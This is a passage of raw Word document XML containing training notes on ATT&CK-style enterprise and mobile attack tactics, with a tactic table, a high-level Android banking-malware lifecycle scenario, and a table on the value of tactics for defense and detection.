    <w:p w:rsidR="53694B8E" w:rsidP="3E79F1B8" w:rsidRDefault="53694B8E" w14:paraId="60C5CF20" w14:textId="5A39F3FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="53694B8E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tactics in Attack Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53694B8E" w:rsidP="3E79F1B8" w:rsidRDefault="53694B8E" w14:paraId="1B096B9E" w14:textId="59E6ECC7">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="53694B8E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enterprise Tactics are </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="53694B8E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mapped to real-world attack stages</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="53694B8E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53694B8E" w:rsidP="3E79F1B8" w:rsidRDefault="53694B8E" w14:paraId="5A59725A" w14:textId="593909C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53694B8E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Gaining access → </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="53694B8E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53694B8E" w:rsidP="3E79F1B8" w:rsidRDefault="53694B8E" w14:paraId="7F06A221" w14:textId="71B6C0A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53694B8E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Running malware → </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="53694B8E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53694B8E" w:rsidP="3E79F1B8" w:rsidRDefault="53694B8E" w14:paraId="028117A7" w14:textId="45345FF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53694B8E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Staying hidden → </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="53694B8E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defense Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53694B8E" w:rsidP="3E79F1B8" w:rsidRDefault="53694B8E" w14:paraId="3A950CF5" w14:textId="2EA8562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53694B8E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Stealing data → </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="53694B8E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53694B8E" w:rsidP="3E79F1B8" w:rsidRDefault="53694B8E" w14:paraId="76AD3EDA" w14:textId="47CB7E7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53694B8E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Damaging systems → </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="53694B8E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="21A322D5" w14:textId="53D7C444">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="26D32B91" w:rsidP="3E79F1B8" w:rsidRDefault="26D32B91" w14:paraId="1D1F95EA" w14:textId="62AF1F76">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="26D32B91">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Mobile Tactics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5809A0ED" w:rsidRDefault="5809A0ED" w14:paraId="68C2EE16" w14:textId="0C47475B">
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5809A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Tactics</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5809A0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 the </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5809A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objectives</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5809A0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attacker wants to achieve when attacking a mobile device. These are not specific methods (that's for techniques), but rather the </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5809A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 or purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5809A0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behind an attack action.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:bidiVisual w:val="0"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="DFDFDF" w:sz="6"/>
          <w:left w:val="single" w:color="DFDFDF" w:sz="6"/>
          <w:bottom w:val="single" w:color="DFDFDF" w:sz="6"/>
          <w:right w:val="single" w:color="DFDFDF" w:sz="6"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="1681"/>
        <w:gridCol w:w="6980"/>
      </w:tblGrid>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="328C2C67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27D2DFB2" w14:textId="617B0468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ID</w:t>
            </w:r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0175E4B7" w14:textId="655FE8FE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7F121654" w14:textId="0592ECE3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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="7634C61D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B2F2BC5" w14:textId="7C6743E1">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rca07e6b82dfd49e0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TA0027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64024DA" w14:textId="2134B262">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R442473e150bf403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Initial Access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0189A54" w14:textId="5DA1D696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get into your device.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="259929C2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B238E64" w14:textId="4D5E9153">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Re557f9b7c4ee46c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TA0041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42BBD1F" w14:textId="086A9E33">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R81947fe08e0e4a8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Execution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533F173" w14:textId="4E07A9FD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run malicious code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="79B68854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C1E3750" w14:textId="36D8F13D">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R58d2f540bfc74f6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TA0028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00277CC" w14:textId="41CF0E53">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rca5fb6c8f386490c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Persistence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2F90043" w14:textId="57E9EA01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maintain their foothold.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="3B1D76CE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CA526BF" w14:textId="22E1920E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rb6dd974d7bf04cf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TA0029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1B1102C" w14:textId="6B7633C1">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R3bfcf127015d489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Privilege Escalation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A5A8664" w14:textId="1C4CDE0B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gain higher-level permissions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="63D73643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4BC3586" w14:textId="52BA0CB8">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rf3753f9ce03646ac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TA0030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FDECCEB" w14:textId="03DA718F">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R7fb47b30b898457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Defense Evasion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BB7E827" w14:textId="3928DF41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avoid being detected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="06A4C6BD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03241D7" w14:textId="10857D38">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Ree75b040fbf54e7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TA0031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64C147D" w14:textId="7D6AF4F7">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rf62f30c4360547c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Credential Access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5A3DD1C" w14:textId="2D8F04C5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steal account names, passwords, or other secrets that enable access to resources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="071A88C5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B262DC7" w14:textId="7E2B4F5E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R922e1ea01dbc4285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TA0032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2247482" w14:textId="5E19B74D">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R8b6089bf3fe3487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Discovery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09E7899" w14:textId="793DEFE2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figure out your environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="64DC16CA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1BDF8CC" w14:textId="3E7815D6">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rd7495d128ba8470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TA0033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CC75812" w14:textId="3AF4C31A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R65f7d972c5fc495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Lateral Movement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616EA04" w14:textId="666808B8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move through your environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="0CC082DE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B64A615" w14:textId="2D5D2170">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R681688f52df8481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TA0035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52BE3FF" w14:textId="6638948F">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R91cea408d36e4cdb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Collection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77CC757" w14:textId="10EFD6CF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gather data of interest to their goal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="5F18C36E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A7DEC69" w14:textId="01B244D1">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Re13cb66218274dc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TA0037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634CBD6" w14:textId="61C5C184">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R72023281ecca429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Command and Control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FE7A3EF" w14:textId="35F17844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communicate with compromised devices to control them.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="10FFCC87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BB80463" w14:textId="215A2403">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R91f316b293c7434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TA0036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D106539" w14:textId="29A9D0BA">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Ra4c525850fa74e6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Exfiltration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9453632" w14:textId="372E3EA0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steal data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="28F771CE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70F3DB9" w14:textId="1C577E45">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R57da3d517c224b0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TA0034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8C65B71" w14:textId="65466DB3">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Re7632998a4574a35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Impact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2C11B14" w14:textId="1B8E31DD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manipulate, interrupt, or destroy your devices and data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="4981C3E3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DB36972" w14:textId="66431D87">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R77e223ab91354ef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TA0038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1889ABE" w14:textId="24C026C1">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R7ee745a179a3484b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Network Effects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A17CEED" w14:textId="4A5483C0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intercept or manipulate network traffic to or from a device.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="2548C089">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699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4F8B983" w14:textId="5BDC0237">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Refd2ed7429764aa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TA0039</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1681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8ECD223" w14:textId="4D540400">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R180d138986b6457b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Remote Service Effects</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6980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DF1E400" w14:textId="36AF5ABD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control or monitor the device using remote services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="698D03C9" w14:textId="451935AC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="6924C794" w:rsidP="3E79F1B8" w:rsidRDefault="6924C794" w14:paraId="6D295BBA" w14:textId="55ED061A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6924C7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Scenario (Android Malware):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6924C794" w:rsidP="3E79F1B8" w:rsidRDefault="6924C794" w14:paraId="5FD6C95E" w14:textId="6030CBBB">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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Let’s walk through a mobile attack lifecycle using tactics:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6924C794" w:rsidP="3E79F1B8" w:rsidRDefault="6924C794" w14:paraId="7FBE9B61" w14:textId="2B49A36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Reconnaissance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Attacker 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researches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victims on social media.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6924C794" w:rsidP="3E79F1B8" w:rsidRDefault="6924C794" w14:paraId="2EDFC4AA" w14:textId="736F4C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Development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Creates fake banking app with malware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6924C794" w:rsidP="3E79F1B8" w:rsidRDefault="6924C794" w14:paraId="1F1F9513" w14:textId="1E6D84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Access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Victim downloads the app from a third-party store.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6924C794" w:rsidP="3E79F1B8" w:rsidRDefault="6924C794" w14:paraId="3A2B08B9" w14:textId="2AB5D07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️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App runs and installs background services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6924C794" w:rsidP="3E79F1B8" w:rsidRDefault="6924C794" w14:paraId="28307F18" w14:textId="7F7878D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Persistence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App auto-starts after reboot using </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6924C794">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RECEIVE_BOOT_COMPLETED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924C794" w:rsidP="3E79F1B8" w:rsidRDefault="6924C794" w14:paraId="07EDD895" w14:textId="62D9577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Privilege Escalation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App exploits vulnerability to gain root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="158A7BC8" w14:textId="7395CE1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3E79F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Defense Evasion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Hides icon and uses encrypted C2 communication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6924C794" w:rsidP="3E79F1B8" w:rsidRDefault="6924C794" w14:paraId="093B083E" w14:textId="57AE1CD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Credential Access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App mimics login screen to steal banking credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6924C794" w:rsidP="3E79F1B8" w:rsidRDefault="6924C794" w14:paraId="1B246A57" w14:textId="317F859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Discovery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Reads contact list and device metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="12C5371F" w14:textId="3BA700D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3E79F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C2 Communication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Sends logs and commands from C2 server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="4E589E02" w14:textId="4D5DD47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3E79F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Exfiltration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Uploads credentials and screenshots to attacker server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="7ACA8B72" w14:textId="6E967E9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3E79F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6924C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</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6924C794">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Locks the device and demands ransom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6924C794" w:rsidP="3E79F1B8" w:rsidRDefault="6924C794" w14:paraId="5E5C8E1D" w14:textId="160CEB0D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6924C7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Why Mobile Tactics Matter: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79"/>
        <w:gridCol w:w="8088"/>
      </w:tblGrid>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="47A18B07">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2679" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="0338944E" w14:textId="4C398E2C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Benefit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8088" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="2CD3B744" w14:textId="7E1B73C4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Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="5DCA2219">
        <w:trPr>
          <w:trHeight w:val="570"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2679" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="539BFB85" w14:textId="76472822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Structured Defense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8088" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="330DE60F" w14:textId="6FF77BE2">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Security teams can design mobile-specific defenses based on each tactic stage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="23D57974">
        <w:trPr>
          <w:trHeight w:val="660"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2679" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="3502DF64" w14:textId="39837E7C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Threat Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8088" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="5D2C33CC" w14:textId="27E8F674">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Helps understand real-world attacker behavior in mobile environments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="0CF847E6">
        <w:trPr>
          <w:trHeight w:val="1080"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2679" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="064E5CB9" w14:textId="4172B34B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t xml:space="preserve">️ </w:t>
            </w:r>
            <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F1B8">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Detection Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8088" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="60E865FC" w14:textId="3C0268C5">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Tactics support the mapping of security tools (like EDR, antivirus) to attacker goals.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="5059BFFF">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2679" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="635C60CE" w14:textId="776B16B1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Awareness &amp; Training</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8088" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="39D15A07" w14:textId="140D583A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
